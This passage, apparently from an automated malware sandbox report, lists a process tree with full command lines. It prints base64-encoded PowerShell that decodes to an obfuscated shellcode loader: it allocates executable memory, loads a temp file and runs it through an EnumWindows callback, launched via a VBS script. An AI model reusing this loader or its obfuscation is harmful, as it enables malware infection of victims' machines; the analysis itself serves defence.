0AYQBpAG4AYQBzAGMAaABlACwAaQBuAHQAIABNAG8AcgBhAGwAaQB0ADEALABpAG4AdAAgAFQATwBSAEUAQQBEAE8AKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAEYAbwByAGwAeQA5ADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAHIAdQBzAHQAbgBpAG4AZwBlAHIALABpAG4AdAAgAFAAbwBpAG4AdABzAG0AZQBuAGgALAByAGUAZgAgAEkAbgB0ADMAMgAgAEYAbwByAGwAeQA5ACwAaQBuAHQAIABXAE8AUgBLAFMASABJAFAATQBFACwAaQBuAHQAIABGAG8AcgBsAHkAOQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBFAFIATgBFAEwAMwAyACIALAAgAEUAbgB0AHIAeQBQAG8AaQBuAHQAPQAiAFIAZQBhAGQARgBpAGwAZQAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAEMARABBAEMAKABpAG4AdAAgAFAAbwBpAG4AdABzAG0AZQBuAGgAMAAsAHUAaQBuAHQAIABQAG8AaQBuAHQAcwBtAGUAbgBoADEALABJAG4AdABQAHQAcgAgAFAAbwBpAG4AdABzAG0AZQBuAGgAMgAsAHIAZQBmACAASQBuAHQAMwAyACAAUABvAGkAbgB0AHMAbQBlAG4AaAAzACwAaQBuAHQAIABQAG8AaQBuAHQAcwBtAGUAbgBoADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBVAFMARQBSADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0AVwBpAG4AZABvAHcAcwAoAEkAbgB0AFAAdAByACAAUABvAGkAbgB0AHMAbQBlAG4AaAA1ACwAaQBuAHQAIABQAG8AaQBuAHQAcwBtAGUAbgBoADYAKQA7AA0ACgANAAoAfQANAAoAIgBAAA0ACgAjAEgATwBWAEUARABCAFkAIABWAEUATABTAEUAUwBNACAARQB2AGUAcgBlAGQAIABQAHIAbwBhAG0AYQB0AGUAdQAgAHAAYQBhAHMAawB5AG4AZAAgAEgAYQBhAG4AZABlAHYAZQBuACAAZgBvAHIAbABiAGUAcgBuACAAYgBlAHQAaABhAG4AawBpAG4AZwAgAGUAdQByAG8AdgBpAHMAaQBvACAARgBvAHIAdQBkAGQAaQBzACAADQAKACQARgBvAHIAbAB5ADkAMgA9ACIAJABlAG4AdgA6AHQAZQBtAHAAIgAgACsAIAAiAFwATwBWAEUAUgAuAGQAYQB0ACIADQAKACMAYgBvAG8AawBsAGkAZgB0AG0AIABGAG8AcgBzAGEAZQBkAGUAdQAgAFUAbgBkAGUAcgBzACAAYgBvAHIAdABmAG8AcgBrACAAZABlAHQAZQAgAEwAYQBtAHAAYQAgAEIAbABhAG4AYwBoAGUAZAA2ACAAVABhAHcAcABpAGUAbQBhAHMAdAAgAHQAaQBsAHMAdABhAG4AZAAgAGsAYQByAHQAbwBuAG4AIABCAGUAdgBpAGwAZwBlAG4AZAAxACAAQgBhAGcAZwByAHUAbgBkADEAIABUAGEAbgB0AGEAbABpAHMAZQAyACAAQgBsAG8AZAB0ADMAIAANAAoAJABGAG8AcgBsAHkAOQAzAD0AMAA7AA0ACgAkAEYAbwByAGwAeQA5ADkAPQAxADAANAA4ADUANwA2ADsADQAKACQARgBvAHIAbAB5ADkAOAA9AFsARgBvAHIAbAB5ADkAMQBdADoAOgBOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKAAtADEALABbAHIAZQBmAF0AJABGAG8AcgBsAHkAOQAzACwAMAAsAFsAcgBlAGYAXQAkAEYAbwByAGwAeQA5ADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAIwBTAHYAawBsAGkAbgBnAGUAcgBuADEAIABiAGwAYQBuAGsAIABHAHUAdAB0AGUAcgBzAHMAZQAgAFUASABZAEcARwBFAE4AUwBJAEwAIABVAGYAbwByAGQAIABSAGkAZwBzAGcAcgBlACAAQgBMAE8ASwBOAEkAIABFAFYAQQBOAEUAUwAgAFQAcgBhAGMAdABhAGIAIABKAHUAbABlAG4AZQBnACAAYgBuAGYAYQBsAGQAZQBsAHMAIABNAEkAUwBMACAAbwBtAHMAdAAgAFQAZQBzAHQAaQBrAGwAZQBuADYAIABGAGkAbABtACAAcABhAG0AcABhAG4AZwBvAGsAbwAgAA0ACgAkAEYAbwByAGwAeQA5ADQAPQBbAEYAbwByAGwAeQA5ADEAXQA6ADoAVgBpAGEAYwAoACQARgBvAHIAbAB5ADkAMgAsADIAMQA0ADcANAA4ADMANgA0ADgALAAxACwAMAAsADMALAAxADIAOAAsADAAKQANAAoAIwBMAGUAbgBzAGEAZgB0AGEAbABlACAATgBhAHQAdQA4ACAARgBPAFIAUwBBAE0ATABJAE4AIABJAG4AawBvACAAUwBVAEIATQBPAEQARQBBACAAZQBsAGUAZgAgAGMAYQB0AGEAcgBpAG4AZQBzACAAQgByAGEAbgBjAGgAZQBvAHIAIABOAG8AbgBmAGEAbgA1ACAATQBpAHMAdwA3ACAAQgBpAGwAbAAgAHoAbwBlAGYAbwByACAAUABhAGwAYQBlACAASwBoAGEAcgB1AG4AIAByAGUAdAByAGkAYgB1AHQAaQAgAFMAdQBmAGYAcgBhAGcAZQB0ACAATABpAG4AcwBlAHIAbgA3ACAARQBrAHMAaQBsAGUAcgA5ACAAYwBhAHQAYQBsAHkAcwB0AGwAZQAgAFYAYQBnAGkAZgAgAFMAawByAGwAbABlAHIAYQBuAGkAIABSAEUAVABTAEEAIABUAGgAcgBvAGMAawBzAGkAIABJAG4AZQBmAGYAaQBjAGEAYwA4ACAAZwBlAG4AZQByAGEAIABVAGwAdgBlAHUAbgBnACAATgBpAGcAaAB0AHcAYQByAGQAbgAyACAASwBWAEEARABSAEEAVABUAEEAIAANAAoAJABGAG8AcgBsAHkAOQA1AD0AMAA7AA0ACgAjAEwAYQBuAGQAcwByAGUAdABwAG8ANAAgAE8AcABzAHYAdQBsADMAIABLAG8AbgB0AHIAYQAgAHAAcgBlAGQAZQAgAEIAUgBBAE4ARABTAEwAIABTAEsATwBWAEQAQQBIAEwAVQAgAGQAZQBjAGEAbgBhAGwAcwBhACAAawBhAG8AbABpAG4AcwBhACAAZwByAHUAdAB0AGUAZABlACAAUwB0AHIAbQBmAG8AcgBiACAAUABzAGUAdQBkADYAIABIAGUAcAB0AGEAcgBjADgAIABTAGUAYwByACAAYgBpAGwAbABvAHcAaQBuACAAYgBhAHQAYwAgAEYASQBUAFQAQQBCAEwARQAgAFAAaQBuAGsAbgBlAHMAcwBlACAAUABTAE8AQwBJAEQAQQBFAEMASAAgAA0ACgBbAEYAbwByAGwAeQA5ADEAXQA6ADoAQwBEAEEAQwAoACQARgBvAHIAbAB5ADkANAAsACQARgBvAHIAbAB5ADkAMwAsADUAOQAxADcAOQAsAFsAcgBlAGYAXQAkAEYAbwByAGwAeQA5ADUALAAwACkADQAKACMAdABoAGUAbQAgAFMAUABBAFQAQQBMACAAUwB0AGEAbABsAGUAcgBvADgAIABQAGkAcwB0AGkAIABPAGUAZABpAGMAbgAgAEMAQQBOAE4ASQBCAEEATAAgAEwAeQBrAGsAZQBkAGUAcwBzADcAIAB0AHIAZQBkAGkAdgBlAGEAYQByACAAUgBlAGoAcwB0AGYANAAgAFMAVQBQAFAARQBUAEUAUgBSACAARgBsAGUAcgBkAG8AYgAxACAASQBuAG8AcgBkAGkAbgA1ACAASwBOAEIARQAgAFMAdABhAHQAaQAgAFIAZQBzAHQAYQB1AHIAYQB0ADgAIABMAGkAdABoAHkAcwA4ACAATABFAFQAVABSAE8AIABsAGkAZwByAG8AaQBuAHMAcgAgAEQAcgBiAHQAIABkAGUAZwBhAHMAcwBlAHMAIABCAGwAcgBlAHIAbwA4ACAADQAKAFsARgBvAHIAbAB5ADkAMQBdADoAOgBFAG4AdQBtAFcAaQBuAGQAbwB3AHMAKAAkAEYAbwByAGwAeQA5ADMALAAgADAAKQANAAoADQAKAA== MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 8852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • csc.exe (PID: 5172 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ppgnlr3u\ppgnlr3u.cmdline MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 6856 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41DC.tmp" "c:\Users\user\AppData\Local\Temp\ppgnlr3u\CSC3E3BD6AE19504271A02C9239AA6C641F.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • ieinstal.exe (PID: 8904 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: 7871873BABCEA94FBA13900B561C7C55)
        • wscript.exe (PID: 2852 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Touchb.vbs" MD5: 4D780D8F77047EE1C65F747D9F63A1FE)
          • powershell.exe (PID: 7456 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBtAGUAcwBvACAAZABpAHQAdABvAGcAIABzAHQAagBlAHIAdABoAGEAZwBlACAAUAByAGUAdgBhAHIAaQBjAGEAdAAxACAAUAB5AHIAbwBsADYAIABkAGUAbAB1AG0AaQBuAGkAIABUAGEAcwB0AGUAYQByADcAIAB0AHIAbwBwAG8AIABlAG4AZwByACAAbgBvAG4AcgBlAHAAZQBuAHQAYQAgAA0ACgAjAFMAbQBpAHQAdAB5ADEAIABTAFAAUgBFAE4ARwAgAFUATgBWAEkAUwAgAEEAbABsAGUAcgBoAHYAIABBAHIAYwBoAGkAcAA5ACAAUgBJAE4ARwBNAFIASwBOAEkAIABVAG4AYwBvAG4AOQAgAEoARQBOAEIAUgBZACAARQBqAGEAawB1AGwAZQAgAFMAVABKAEUAUgAgAEsATwBNAE0AVQBOAEkASwAgAFMAbwByAHQAawA4ACAAcABoAGEAZQAgAFUAcQB2AHMAeQAgAE0AbwBuAG8AcAAzACAAQwBvAHUAbgB0AGUAcgBjAGwAMQAgAGIAYQBhAGwAYQBtAGIAcwAgAEUAeABwAGwAbwBzAGkAYgBsACAARQBQAEkARwBSACAAQwBlAHAAaABhAGwAbwBoAHUAbQAgAHQAZQBnAG4AdAAgAEcAUABTAEUATQBVAEwAUwAgAEEAZgBsAGEAYQBzADYAIABBAHMAYgBrADYAIAANAAoAIwBhAGIAaQBkAGkAIABQAGUAbgBnADkAIABhAHAAaABhACAAQwBhAHUAbABrAGUAcgBzACAAVABSAEYARgBFACAAVAB5AHAAaABvAG8AbgB0AG8AMwAgAGsAcgBhAHAAaQBuAGEAZgAgAEUAbgBsAGkAZwBzAHQAaQAyACAAUwBhAG4AawB0AGgAYQBuAHMAIABHAGUAbgBuAGUAbQA4ACAAQwBlAGwAaQBlAGMANgAgAEsAYQB0AGoAIAANAAoAIwBFAHAAaQBsAGUAcABzAGkAZQBuACAAUwBFAE0ASQBTAE8ATABVACAAcwBwAHIAZQBkAG4AaQBuACAATQBFAFQASABZACAAUABhAHIAYQBtAGUAIABCAHIAbgBlAGgAYQB2AGUAMgAgAEcARQBSAE0AQQBOAEkAUwBUACAARABSAEUAVABTAFMAIABFAE4AUwBQAE8AUgBFAFQASAAgAFMAdABlAGQAbQBvAGQANwAgAFMAdgBvAHYAbABzAHkAcgBlACAAQgBvAHIAZwBlAHIAcgAgAEsAbwBsAHAAbwByAHQAMQAgAHAAbABlAHUAcgBvAHQAIAANAAoAIwBiAG8AbgBzAGEAaQAgAFAAcwBlAHUAZABvACAAZgByAGkAdABpAGQAcwBjAGUAbgAgAFQARQBBAFQARQBSAEcATgAgAFAATABBAE4ARQBSAFMAIABWAEkATgBEAE0AIABTAHAAYQBsAHQAZQAgAFQAYQBiAGUAbAAyACAAQQBtAGIAYQBkAGUAZQBkAGkAZQAgAEMAaQBuAGQAZQByAHMAYgBhAG4AIABDAG8AYQB0AHQAMwAgAEMASABSAE8ATQBBAFQAIABjAGEAcgBsACAAUwB0AGkAZgB0ADEAIABzAHQAdgBmAG4AIABLAG8AbQBtAHUAbgBhADMAIABSAFIAVABBAE4AIABOAG8AbgBvAGkAbAAgAA0ACgAjAHMAZQBwAHQAZQBuAGEAdAAgAFAAcwBlAHUAZABvAGEAbQBiADgAIABOAG8AbgByAGEAYwBpAGEAIABWAGwAZwBlAHIAZQBzAGsAMwAgAEQAbwBnAGgAbwAgAFAAcgBvAGcAcgBhAG0AbQAgAEYATABVAEcAVABTAEsAWQBEACAAYwBsAGEAdQBzAHQAIABTAEUATABWAEYASQBOACAADQAKACMAZABpAHMAcABlAG4AcwAgAEEARgBGAEEATABEAFMAUAAgAFAAbABuAGUAcgBuAGUAcgAgAEcAbwByAGQAeQBrAG4AMQAgAEIAaQBvAGUAbAAgAFIAaABpAHoAIABOAG8AbgBhAGQAagBhADkAIABCAHIAaQBzADIAIABTAFQAVQBEACAAawBvAHIAcABvAHIAbABpAGcAdAAgAEMAaABhAHIAYwB1AHQAaQAyACAATQBhAGwAdABpAG4AZwBwAGUANgAgAFMAaQBrAGsAZQByAGgAMwAgAFUATgBJAFQASQBOAEcASQBOACAAZABpAHMAZQBuAHMAIAANAAoAIwBTAFAASQBTACAAcwB0AHIAeQBrAG4AaQAgAFQAcgBlAGEAcwB1AHIAZQAyACAAZgByAGUAZQB6ACAARABpAHMAbwByAGQAZQAgAEMAaQBmAGYAZQByAGYAbAAgAG0AZQB0AGEAZwBlAHMAIABVAHMAdABlAG0AcAAgAGUAZgB0AGUAcgBrAG8AbQBtACAAUwB5AG4AcwBtAHMANAAgAEwATgBTAEwAQQBWAEUAUwBSACAAQwBhAHQAcwA0ACAAcwBvAHYAcwAgAFcAaQBuAHMAIABQAHIAZQBjAGUAcAB0AGEANwAgAFQAQQBSAFMATwBNAEEATAAgAE8AYgBzAHQAZQByAG4AYQBzAGkANAAgAEUARgBUAEUAUgBUAFIAIABCAGwAZQBzAGsAdQBkADIAIAANAAoAIwB3AG8AbwBsAGUAbgBzAHIAIABQAEwATwBDAEUASQBGAE8AUgBNACAAUgBhAHUAbgBvACAAVABZAFAARQBSACAAaQBuAG4AdQBlAG4AZABvACAAUgBBAFAAUAAgAEIAbwBnAHMAdABhAHYAawAgAHUAYgBlAHMAIABBAGIAcwBpAG4AdABoACAARgBvAHIAcwBrAG4AaQBuACAASABPAFQARQBMAFYAUgBUACAAUwBrAGkAbgBuACAAYgBlAGQAcgBpAGYAdABlAG4AIABCAFIATwBLACAAZgBvAHIAcwBrAHUAZABzAGIAIABNAGkAcwBpACAAQQB1AG0AYQA2ACAATQBvAHMAcwBlAHIAbgBlAHMAIAANAAoAIwBIAGUAbQBpAGgAeQBwAGUAcgBpACAAQQBpAGsAbwBzACAAbQBhAGsAcgBvAGYAdQAgAHAAaQBsAGwAbQBhAGsAaQBuAGcAIABIAGEAYgBhAG4AZQByAGEAcwBkACAAVAByAG8AbAA2ACAAUgBZAEcAVABJAEsAQQBNAFAARQAgAFQAUgBGAEwARQBSAE4ARQBQAE8AIABtAG8AZABzAHQAYQBuAGQAcwAgAEQAeQBuAGEAbQBpACAAcAB1AGwAdgBpAG4AIABIAHkAcwB0AGUAcgBlAGMAdABvADEAIABNAHQAbgBpACAAYwBoAGEAcgB0ACAATABFAE0ATQBBAFQAQQBBAE4AIABLAG4AcwBrADYAIABmAGkAbABzAHQAcgB1AGsAdAAgAA0ACgAjAEsATwBFAFIAUwBMAEUAIABTAFQAWQBSAEUAVgBBAFIASQBBACAAQgBsAG4AZABlACAAUwBlAGQAaQBtADQAIABDAFIATwBTACAARABVAEUATABMAEUAUgBFACAAawByAHUAbQBtAGUAcwB1ACAAUABzAGUAdQBkAG8AcAAgAHMAaABlAHIAIABTAHQAYQBuAGQAaABhAGYAIABmAG8AcgB2AGUAIABTAGsAYQB0AHQAZQBhAGYAZABlACAAUgBFAFYARQBSAFMAQQAgAFQAUgBJAEwATABJAE8ATgBUAEEAIABQAHIAcgBpAGUAIABIAHYAaQBkACAARABhAG0AcgAxACAAVQBuAHMAdQA5ACAAcwBhAG4AagBhAHMAcABlAHcAIABmAGwAeQBkAGUAIABMAEkATgBHAFUATwBWAEUAUgBTACAAUgBlAHMAcABvADkAIAANAAoAIwB0AGkAbABmACAAUwBoAG8AdABnAHUAbgBhAGYANgAgAFoAdQBuAGkAcwBzADIAIABiAHIAZQByAGEAawAgAEMAQQBOAEMAQQBOAFIAIABNAGkAbgBjAGUAcwAxACAAVAByAGkAdABhAG4AMwAgAEwAQQBCAE8AIABLAGEAbQBtAGUAcgBtAHUAIABjAG8AdQBuAHQAZQByAHIAIABmAG8AbABrAGUAZAByACAAVABlAGwAZQB0AGUAawBuADYAIABJAG4AZABpACAAYQBmAHMAYQB2AGUAcgBoACAAaQBuAGQAYgAgAFAATABBAE4ASwAgAEkAbgB0AGkAOAAgAEkAbgBmAGkAbgBpADUAIABhAG0AbgBpACAAUABSAE8AWABJAE0ASQBUACAAbwB0AGEAcwByAGkAcwB0AG4AaQAgAG0AbwB1AGwAZABzAGEAdQAgAA0ACgAjAG8AcgBnAGEAbgBlAHQAbABhAHMAIABOAG8AbgBpACAAbgB5AHQAdAAgAG0AdQB0AHUAIAB0AGEAawBuACAATwBtAGsAcgBlAGQAcwBlAG4AIABNAEkATgBJAE0AVQBNAFQAUgAgAE8AdgBlAHIAdABqADIAIABTAHQAcgBlAGEAawAgAFMAYQBuAHMAIABCAGkAbwBtAGUAMwAgAGYAYQBpAHIAawBlACAARwBlAGIAcgBvAGsAbgA2ACAAQgBlAG4AYQBlAGcAdAAxACAAUwBDAEgARQBOAEsATAAgAFUARABMAEkAQwBJACAAQwB5AGQAaQBwAHAAaQBkADMAIABMAGEAbgBnAHQAdQByAHMAYwA1ACAAdQB0AHQAaABlAGQAZQByAHMAIABiAGwAbwBrAHAAbwBzAHQAbQAgAFEAdQBhAHIANQAgAGgAbwBtAGUAbwB0AGgAZQByACAAQQBjAGsAbABlAHkAYwBlADgAIABzAGEAbQBtAGUAbgBwAHIAZQAgAGUAbABhAHMAdABpAG4AcwBoAGEAIAANAAoAIwBGAFIAUwBUAEUARABJAFIAIABVAEQATQBBAFQAUgAgAEsAaQBkAGwAaQBrACAARABJAEEARwBOAE8AIABXAEkATQBQAEkATgBFAFMAIABCAHIAbwBhAGQAbABpAG4AZwBzACAAUwBrAGkAbgBrAGUAcgAgAFAAcgBvAHQAbwBnAGkAbgAzACAARQBNAFAASQBSAEkAUwAgAFMAawBlAGUANQAgAE0AQQBOAEQAQQAgAFMAUABJAE4AQQBUAEYAIABTAHAAZQBjAGsAbABpAG4AZwB6ADYAIAANAAoAIwBSAGEAYQBkADMAIABTAE8ATgBHAFcAUgBJAFQAIABBAG4AdABoAHIAbwBwAG8AIABUAEUATABFAEYATwBOAFMAIABBAE0ARQBOAEEATgAgAFMAbQBlAGwAIABTAHQAYQBsAGQAYgByAGQAcgAgAEYAWQBSAFYAUgBLAEUAUgBFAFMAIABTAG4AaQBwAGUAbgBiADYAIABTAGkAdAB1ADkAIABBAHUAZABpAGUAbgAyACAAUgBpAGsAbwBjAGgAZQB0ACAASQBuAGMAdQByAHMAbgB5ACAARgBvAHgAdABhAGkAbABzAGQAYQAgAEEASwBLAFIAIABBAGsAaQBtAGgAdQBzADYAIABJAG4AcwB1AHIAcgBlADMAIABCAG8AdAB0AGwAZQBjAGEAcAAgAEUAdQBvAG4AeQBtAGkAbgBkACAAcABhAHAAeQByAG8AZwAgAFAAZQBkAGkAIABNAG8AcABpAHMAaABuAGUAcwBzACAAQQBmAGYAZQBqAGUAbgBkAGUAcwA2ACAAQgBSAEkARwBHAEUATgBEACAAQgBhAHIAcwBlACAAVQBuAGQAZQByAGsAIABQAFIATwBEAEQARQAgAEoARQBOAEwAIAANAAoAIwBiAGUAbgBlAGwAIABkAGkAcABwAGUAcgAgAFIAYQBkAHoAIABqAGUAYgBsAGkAawBzAGEAZgB0ACAAdABlAGsAbgBvAGsAcgBhAHQAIABTAHcAaQBuACAATQBhAHIAbQBvAHIAIABNAGUAcgBlADEAIABTAGsAcgBrAHAAcgBvAHAAYQAgAEYAYQB0AHQAaQBnAGcAMwAgAHYAZQBhAGQAbwByAGUAbwB1ACAATgBPAE4AVgBBAFMAQwAgAHIAYQBuAGsAbABlACAAQgByAG4AZQAgAEMAbwBtAHAAIAANAAoAIwBNAGEAcwB0AGUAcgBsAGkAawBlACAAaABlAGwAaQBvAGwAbwBnAGkAIABEAG8AbABiAHkAcwB5ACAATgBFAEQARQAgAFAATwBSAFQASQBFACAAQQBuAGcAcwB0AHQAcgBzAGsAIABBAGsAdABpAG8AbgBzAGcAIABZAGQAZQByAHIANwAgAEUAVgBJAEcASABFAEQAUwBLACAAUwBQAEkATABEACAASQByAGkAdABpAGMAIABHAG4AYQB0AGgAbwBiAGQAZQAxACAAYgBsAGEAcgB0AGYAbwByAHMAIABSAGUAZgByAG4AcwA2ACAAbABlAGQAaQBnAGgAZQAgAEYAbwBkAGcAbgBnAGUAcgBuACAADQAKACMAUwBtAGUAbAB0AGUAbwBzACAARQBuAG8AcwBpAHMAZQBzACAAUwBQAEEATgBJAEUAUgAgAGEAZgB0AGUAcgB0AGEAeABhAG0AIABNAEUAWgBaAEEATgBJAE4ARQBUACAATABHAEQATwBNAE0ARQBSAEUAIABOAGUAZABzAGwAYQBnAGUAbgAgAG0AbwBsAGUAcAByAG8AIABiAG4AcwBrAHIAaQBmAHQAZQAgAEMAdQBzAGgAaQAgAFMAaABlAHQAbABhAG4AZABzAHAAIABEAGQAbgBpAG4AZwAgAEIAZQB0AHIAawBrAGUAMQAgAEcAbwBkAG4AYQB0ACAAQwBvAG4AdgBpAHYAaQBhADUAIABTAHAAaQByAGEAbAB0AGEAYQBnACAAcwBhAHgAYwBvAHIAbgBlAHQAIABCAGEAZwBlAHAAIABMAE8AVgBLAEEAVAAgAGEAaQByAGIAdQAgAE4AbgBzAG8AbQA0ACAAQgBsAG8AZABwAHIAbwBwADkAIABSAEgATwBQAEEATABPAEMARQBSACAAZQBuAGMAaABhAHMAZQByACAADQAKACMAdgBvAGwAZAB0AGcAdAAgAFUARABTAEwAQQBHAEcASQBWACAAQgBhAGwAYQBuACAAQQBrAHQAaQB2AGkAdAA0ACAARQBLAFMAUABPAFMASQBUAEkATwAgAHMAdABhAG0AbQBlACAATQB5AHQAaABvAGwAbwA4ACAAVABIAFIATwBUAFQATABFAFIAIABWAGkAbgBkAHUAZQAgAFYAQQBTAEUAUgBIAFUAIABiAGwAbwBkAHMAawB1ACAAaABvAG0AbwBuAHkAbQB5AHUAIABVAFIAUwBLAE8AVgAgAFQAYQBhAGwAbQBvAGQAOAAgAFUASABJAE4ARAAgAFAAUgBPAEQAVQBLAFQASABBACAAVQBNAE8AUgBBAEwARQBOAEQASQAgAEYATwBSAE0AQQAgAEIAbABlAHMAYgA5ACAARwB5AHAAdABlAHIAZQBzAG8ANAAgAEQAYQB0AGEAYgAgAE4AbwByAG0AZQByAGkANwAgAEEAYwBjAGUAcwBzAGkAbwBuADUAIABIAEUATgBTAFkAIABhAG4AdABlAGcAbgBkACAAUABoAHIAZQBuADQAIABQAFIASQBNAEEAVABBAEwAIABOAG8AdABpAGMAZQBzAHMAdAA2ACAATQBPAEQARQBSAEwASQAgAGwAbQByAGsAZQByAHMAdQBsACAARgBJAE4ARwBFAFIAIAANAAoAIwBBAG4AdABpAGMAbwAgAFQAUgBPAEwARABFAFMASwBPACAATABPAFYATQBTAFMASQAgAE8AbQBsAGEAcwB0AG4AaQBuAGcANAAgAHYAYQB3AGEAbgB0AGkAZAB5AHMAIABrAG4AZQBiAGwAaQBuAGcAIABmAG8AcgBzAHQAcgBhAG4AZAAgAFQAaQBlAHQAaQBjAGsAbgBhAGEANgAgAGYAbABsAGUAcwBmAGEAZwBzACAAVABhAG4AZwBsAG8AIABTAHYAZQBuADIAIABQAHIAbwBqADQAIABDAE8AQwBLAFQAQQBJAEwAUwAgAFkAZQBsAGwAbwB3AHIAIAANAAoAIwBIAGEAbgBkAHMAIABTAFkARABTACAAUwBpAG4AaQBjAGkAMQAgAGMAZQBuAHQAIABkAG8AbQBuAGUAcwB0AHIAIABEAGUAbQBvACAAUwBDAFIASQAgAEMASABBAFIAQwBVACAAUwBvAG4AZwBmAHUANgAgAA0ACgAjAEIAQQBVAFMAIABTAFQAUgBBAEYARgAgAEQAdQB0AHQAbwBuAGsAcgBhAG4AIABMAEEASwBTACAAUwBjAHIAZQBlAG4AaQAgAFAAUgBPAEQAVQBLAFQASQBWACAAVwBhAGwAawBhAGIAbwB1AHQAbwAyACAAdABvAGcAdgBvAGcAbgB1ACAASQBuAGMAbwAyACAADQAKACMAYQBuAGsAcgAgAEcAcgB1AHAAcABlACAAYgBpAGwAbABlAHQAdAAgAFQAcgBvAGwAaQBnAHMAIABsAGEAbQBwAGUAcwBrAHIAbQAgAFMAQQBMAEcAUwBDAEgAQQBVAEYAIABCAEUAUwBWAEkATQBFAEIAQQAgAFMAcABlAGUAZABvAG0AZQB0ADcAIABBAEYARgBJACAAUwB5AGcAZQBoAGoAbABwADIAIABWAG8AawBzAGUAbgBkACAAQQBmAGgAbwBwAG4AMQAgAGMAbwBsAGUAYQBkAGUAcgBkACAASgBPAFQAVABJAE4AIABSAG8AdQBzAHQAZABvADcAIABmAG8AcgBzAHQAbwBrACAAdAByAGUAZABqAGUAdgBlACAAUwBwAG8AbABlAHIAZQByAGwAIABhAHIAYgBvAHUAcgBpAHMAIAANAAoAIwBLAGgAYQB0AHMAZgAgAEwASQBOAEQAQQBCAFIAIABCAE8AQwBDACAAVABpAG4AawB0AHUAcgBlAHIAMgAgAEIAZQB6AGEAbgB0AHkAdAA2ACAAZgBqAG8AcgAgAHUAZAB0AHIAeQBrAHMAbQBpAGQAIABzAGEAdQBiAGEAYgBsAGUAbgAgAHMAcABlAGUAZAAgAEQAbwBtAG0AZQBuADcAIAANAAoAIwBEAGkAcwBpAG4AOQAgAFAAUgBPAEwATwBOAEcARQBTAEMAIABBAGIAdABlADEAIABTAGEAbABpAGMAeQAzACAARABFAEkASwBTAEkAIABHAFkATgBHAEUAIAB0AGgAbABpAHAAcwBpAHMAcAAgAEMAaQBsAGkAbwBsACAAaQBuAGYAbwAgAFAAYQBsAGEAZQBvAHIAMwAgAEEAZgBmAGkAMwAgAE0ARQBMAE8AIABEAEkAQgBBAFMASQBDAEkAVABZACAASwBvAG4AYwBlAHIAMQAgAFAAbABvAHUAZwBoAHcAcgBpAGcAIABDAE8AUgBPAE4AQQBHACAAQQBmAHQAYQAgAFMAbwBpAGcAbgA1ACAAUwBuAGkAZgBmACAARABpAHMAZABvACAATABPAEMAUgAgAE0ARQBMAEwARQBNAE0AQQBEACAADQAKACMAUwB2AG8AdgBsADcAIAB1AGQAZwBpAGYAdABzACAATABpAG4AZABlAG4AcABhAGwAYQAxACAAdQBuAGQAZQAgAFUAbgBtAGkAcwAyACAAUwB0AGkAYwBrAGYAYQBzAHQAbgAgAGQAZQBzAHQAcgAgAFUAbgBzAGkAbgBlAHcAaQA2ACAAVwBvAG4AbgBpAG4AZwA5ACAATQBlAGwAbABlAG0AdABpAG4AIABzAGsAeQBkAGUAcgBpACAARwBBAEIARgBFAFMAVABTAFYASQAgAFQASQBMAEcAQQBBACAATwBwAGUAcgAgAEIAdQB0AGkAawBzAGcAYQAgAFQAdQBtAGwAaQBuAGcAIABNAG8AcgBhAG4AbgA0ACAAbwBwAHQAYQBsAHQAZQBzACAAaQBjAGsAZQAgAA0ACgAjAFMAdABhAGIAZQBqAHMAZQByACAAUwBQAFIASQBOACAAQQBtAGIAbAB5AGcAbwBuACAAcABvAHIAdAByAGUAcgBzACAATwByAGQAZABhAG4AbgBlACAAZgBvAG4AZABsACAAUwB0AGEAdAB1ACAARAByAGkAdgBoAGoAdQBsAGUAOAAgAGIAYQByAGIAZQB0ACAAVABSAEEAUABOAEUAIABzAHUAYgBjACAAUwB0AHIAZwBnAGEAcgBuACAARgBvAHIAbQAgAEYAUgBBAEcAQQAgAEQAUwBMAEUAUgAgAEUAUgBHAE8AUwBUAEEAIAANAAoAIwBjAG8AbgB2AGUAeQBhACAAcgBlAGMAaQByAGMAbABpAG4AZwAgAGIAYQBnAGYAbABpAGsAbgBpAG4AIABVAG4AcgBvAHUAbgBkAHMAbAAgAG4AYQBiAG8AYgBlAGIAIABCAG8AcgBlAHQAYQBhAHIAbgAgAFAAYQByAGEAbgBvAGkAZAAgAEEAZgBnAHIAZQBsAHMAZQBzAGYAIABOAG8AbgBjAGUAbABsAHUAbAA2ACAASwBvAHIAcgBlAGsAdABpACAAZAB1AG0AbQBlAHMAdABlACAAQQBnAHIAYQAgAEMATABJAE4ASQBDAFMAQQBHACAATQBpAGwAagAgAE0AYQBsAHQAbgBpACAATwBMAEYAQQBDAFQATwAgAEYAYQBnAGsAcgBpAHQAa